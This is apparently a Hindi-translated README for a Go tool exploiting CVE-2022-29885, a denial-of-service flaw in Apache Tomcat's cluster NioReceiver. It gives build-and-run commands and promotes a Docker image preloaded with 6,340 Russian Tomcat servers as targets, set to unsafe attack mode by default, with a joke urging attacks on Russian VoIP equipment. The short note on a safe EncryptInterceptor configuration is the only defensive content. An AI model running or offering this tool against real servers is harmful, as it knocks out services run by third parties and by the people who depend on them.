
Apache Tomcat DoS (CVE-2022-29885) एक्सप्लॉइट
Apache Tomcat DoS (CVE-2022-29885) शोषण। EncryptInterceptor (Tomcat Cluster) में सेवा से इनकार।
लक्ष्य मशीन को Cluster Nio Receiver शुरू करने की आवश्यकता है।
एक विशेष TCP पैकेट भेजने से लक्ष्य पर सेवा से इनकार हो जाएगा।
चाहे EncryptInterceptor का उपयोग किया जाए या नहीं, इस शर्त के साथ सेवा से इनकार भेद्यता की संभावना है:
Tomcat क्लस्टर फ़ंक्शन सक्षम है और संचार के लिए NioReceiver का उपयोग करता है।
Tomcat का कोई भी संस्करण प्रभावित होगा। एकमात्र समाधान एक विश्वसनीय नेटवर्क का उपयोग करना है।
सुरक्षित कॉन्फ़िग फ़ाइल server.xml में शामिल है
<Interceptor className="org.apache.catalina.tribes.group.interceptors.EncryptInterceptor"
encryptionAlgorithm="AES/CBC/PKCS5Padding"
encryptionKey="ANY_KEY(LENGTH:32)"/>
अन्य सभी कॉन्फ़िग विविधताएँ असुरक्षित हैं।
एप्लिकेशन
1. git clone https://github.com/iveresk/CVE-2022-29885.git
2. cd CVE-2022-29885
3. go build -o /cve-2022-29885
4. ./cve-2022-29885 -t <target_url or file_name> [OPTIONAL] -s false -d false
- t - target URL or filename
- d - debug {true, false} flag which enables or disables logs
- s - safe and unsafe regime switcher. Default value is unsafe.
पूर्व-परिभाषित 6340 रूसी Apache Tomcat सर्वरों वाला Docker 10 सबसे सामान्य Tomcat पोर्ट के लिए गुणा करता है।
डिफ़ॉल्ट Unsafe मोड पूर्व-सेटअप है।
docker run -d masterroot/cve-2022-29885
ruzzland-terrorist-state VoIP उपकरणों के साथ मज़े करें :D

आप किसी भी विवरण के लिए Keybase के माध्यम से मुझसे संपर्क करने के लिए स्वतंत्र हैं।